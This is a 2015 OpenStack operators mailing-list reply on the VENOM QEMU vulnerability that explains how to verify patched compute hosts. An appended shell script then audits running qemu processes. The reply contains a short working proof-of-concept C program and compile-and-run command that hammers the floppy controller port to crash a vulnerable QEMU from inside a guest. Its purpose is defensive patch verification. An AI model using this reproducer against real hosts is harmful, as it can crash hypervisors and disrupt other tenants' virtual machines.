[Openstack-operators] Venom vulnerability

Tristan Cacqueray tdecacqu at redhat.com
Thu Jun 4 18:39:10 UTC 2015


On 06/04/2015 08:50 AM, Fox, Kevin M wrote:
> I'm not aware of any check that actually tests the vulnerability. Just checks package versions.

Hi,

On the compute host you can check the process age using "ps aux". The
START column for every qemu-system-* process should be more recent than
the date you updated. At least, any process older than May 13th still
has the bug.

Also, using PID, you can make sure /proc/$pid/exe is pointing to the new
binary and not a "(deleted)" one.


Within a guest, the condition of exploitation may vary from system to
system. A reproducer has been published here:
 http://seclists.org/oss-sec/2015/q2/448

Though it requires fast timing, here is an updated version to prod the
other vulnerable floppy command:

cat>venom.c<<EOF
#include <sys/io.h>
int main() {
    int i;
    iopl(3);
    for (i=0;i<10000000;i++)
        outsb(0x3f5,"\x8e\x00\x00\x00\x00\x00",6);
}
EOF
gcc -O2 venom.c && sudo ./a.out


This should crash an ubuntu-14.04 instance if qemu is still vulnerable.
However, it's not 100% guaranteed, and you had better make sure qemu-kvm
is up to date and no old qemu instances are running.

Regards,
Tristan
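As an added example (not part of Tristan's mail or of any OpenStack project code), the following POSIX shell script automates the two host-side checks described above: whether each qemu-system-* process was started before the fixed package was installed, and whether its /proc/<pid>/exe link still points at a "(deleted)" binary. It assumes a Linux /proc filesystem and GNU/BSD-compatible readlink, sed and awk. The default cutoff is the May 13th disclosure date quoted in the mail and is only a placeholder; on a real host pass the epoch time at which qemu-kvm was actually updated.

```shell
#!/bin/sh
# Added example: audit running qemu processes on a compute host after a
# QEMU update. Assumes Linux /proc. Not code from the original thread.

# Classify one process from its start time and the update time (both
# epoch seconds) and the target of its /proc/<pid>/exe symlink.
# Prints OK, STALE_START, DELETED_EXE or STALE_START+DELETED_EXE.
classify_process() {
    start_epoch=$1
    update_epoch=$2
    exe_target=$3
    status=""
    # Started before the fix was installed: still running the old code.
    if [ "$start_epoch" -lt "$update_epoch" ]; then
        status="STALE_START"
    fi
    # The binary on disk was replaced but this process still maps the old one.
    case "$exe_target" in
        *"(deleted)"*)
            if [ -n "$status" ]; then
                status="$status+DELETED_EXE"
            else
                status="DELETED_EXE"
            fi ;;
    esac
    [ -n "$status" ] || status="OK"
    printf '%s\n' "$status"
}

# Process start time in epoch seconds, from /proc/<pid>/stat field 22
# (clock ticks since boot) plus the boot time from /proc/stat. This avoids
# parsing the locale-dependent START column of "ps aux".
process_start_epoch() {
    pid=$1
    btime=$(awk '/^btime/ {print $2}' /proc/stat)
    hz=$(getconf CLK_TCK)
    # Strip "pid (comm) " first: comm may contain spaces or parentheses.
    ticks=$(sed 's/^.*) //' "/proc/$pid/stat" | awk '{print $20}')
    echo $(( btime + ticks / hz ))
}

# Walk /proc, report every qemu process and print a summary count.
scan_qemu_processes() {
    update_epoch=$1
    found=0
    for statfile in /proc/[0-9]*/stat; do
        pid=${statfile#/proc/}
        pid=${pid%/stat}
        comm=$(sed 's/^[0-9]* (\(.*\)) .*/\1/' "$statfile" 2>/dev/null) || continue
        # comm is truncated to 15 chars, so "qemu-system-x86" still matches.
        case "$comm" in
            qemu-system*|qemu-kvm) ;;
            *) continue ;;
        esac
        found=$((found + 1))
        exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo "unreadable")
        start=$(process_start_epoch "$pid")
        printf '%s pid=%s start=%s exe=%s\n' \
            "$(classify_process "$start" "$update_epoch" "$exe")" \
            "$pid" "$start" "$exe"
    done
    echo "$found qemu process(es) checked"
}

# Placeholder cutoff: 2015-05-13 00:00 UTC, the disclosure date. Replace
# with the epoch time of the real package update on this host, e.g.
#   sh audit-qemu.sh "$(date -d '2015-05-20 10:15' +%s)"
UPDATE_EPOCH=${1:-1431475200}
if [ -d /proc ]; then
    scan_qemu_processes "$UPDATE_EPOCH"
fi
```

Any line reporting STALE_START or DELETED_EXE identifies an instance that must still be live-migrated or restarted before the host can be considered patched, regardless of what the package manager reports.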


